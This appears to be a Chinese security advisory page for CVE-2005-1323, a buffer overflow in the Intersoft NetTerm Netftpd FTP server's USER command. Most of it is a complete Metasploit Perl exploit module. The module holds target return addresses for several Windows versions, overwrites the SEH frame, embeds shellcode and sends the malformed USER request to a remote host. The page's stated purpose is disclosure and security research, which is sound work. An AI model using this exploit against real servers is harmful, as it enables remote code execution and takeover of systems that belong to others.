安全研究

安全漏洞
Intersoft NetTerm Netftpd USER命令超长参数远程缓冲区溢出漏洞

发布日期:2005-04-27
更新日期:2005-04-27

受影响系统:
InterSoft NetTerm 4.2.2
描述:
BUGTRAQ  ID: 13396
CVE(CAN) ID: CVE-2005-1323

Intersoft NetTerm Netftpd是一款小型FTP服务程序,可使用在Microsoft Windows操作系统下。

Intersoft NetTerm Netftpd对畸形用户请求的处理存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。

Intersoft NetTerm Netftpd在处理带有超长畸形参数的USER命令请求时存在缓冲区溢出,攻击者可以通过发送畸形串导致溢出控制服务器。

<*来源:shadown (shadown@gmail.com
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::netterm_netftpd_user_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
{
    'Name'  => 'NetTerm NetFTPD USER Buffer Overflow',
    'Version'  => '$Revision: 1.2 $',
    'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
    'Arch'  => [ 'x86' ],
    'OS'    => [ 'win32', 'win2000', 'winxp', 'win2003'],
    'Priv'  => 0,
    
    'AutoOpts'  => { 'EXITFUNC' => 'process' },
    
    'UserOpts'  =>
    {
        'RHOST' => [1, 'ADDR', 'The target address'],
        'RPORT' => [1, 'PORT', 'The target port', 21],
    },

    'Payload' =>
    {
        'Space'     => 1000,
        'BadChars'  => "\x00\x0a\x20\x0d",
        'Prepend'   => "\x81\xc4\x54\xf2\xff\xff",    # add esp, -3500                    
        'Keys'        => ['+ws2ord'],
    },

    'Description'  => Pex::Text::Freeform(qq{
        This module exploits a vulnerability in the NetTerm NetFTPD
        application. This package is part of the NetTerm package. This
        module uses the USER command to trigger the overflow.
    }),

    'Refs'    =>    
    [
        ['URL', 'http://seclists.org/lists/fulldisclosure/2005/Apr/0578.html'],
        ['BID', 13396],
    ],
    
    'DefaultTarget' => 0,
    'Targets' =>
    [    
        ['NetTerm NetFTPD Universal',   0x0040df98 ], # netftpd.exe (multiple versions)
        ['Windows 2000 English',        0x75022ac4 ], # ws2help.dll
        ['Windows XP English SP0/SP1',  0x71aa32ad ], # ws2help.dll
        ['Windows 2003 English',        0x7ffc0638 ], # peb magic :-)
        ['Windows NT 4.0 SP4/SP5/SP6',  0x77681799 ], # ws2help.dll        
    ],
                
    'Keys' => ['ftp'],
};

sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
    return($self);
}

sub Check {
    my $self        = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    
    my $s = Msf::Socket::Tcp->new(
        'PeerAddr'  => $target_host,
        'PeerPort'  => $target_port,
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL'       => $self->GetVar('SSL'),
    );

    if ( $s->IsError ) {
        $self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
        return $self->CheckCode('Connect');
    }
    
    my $banner = $s->Recv(-1, 5);
    $banner =~ s/\r|\n//g;
    
    $s->Close;
    
    if ($banner =~ /NetTerm FTP server/) {
        $self->PrintLine("[*] Vulnerable FTP server: $banner");
        return $self->CheckCode('Detected');
    }
    
    $self->PrintLine("[*] Unknown FTP server: $banner");
    return $self->CheckCode('Safe');    
}

sub Exploit {
    my $self        = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
    my $target      = $self->Targets->[$target_idx];

    $self->PrintLine( "[*] Attempting to exploit " . $target->[0] );

    my $s = Msf::Socket::Tcp->new(
        'PeerAddr'  => $target_host,
        'PeerPort'  => $target_port,
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL'       => $self->GetVar('SSL'),
    );

    if ( $s->IsError ) {
        $self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
        return;
    }

    # Overwrite the SEH frame and throw an exception
    my $user = Pex::Text::EnglishText(8192);
    
    # U          push ebp
    # S          push ebx
    # E          inc ebp
    # R          push edx
    # \x20\xC0   and al, al
    substr($user, 0, 1, "\xc0");
    
    substr($user, 1, length($shellcode), $shellcode);
    substr($user, 1014, 4, pack('V', $target->[1]));
    
    $s->Send("USER $user\r\n");
    $s->Recv(-1, 5);
    $s->Send("HELP\r\n");        
    return;
}

1;

建议:
厂商补丁:

InterSoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://starbase.neosoft.com/~zkrr01/html/netterm.html

浏览次数:4863
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障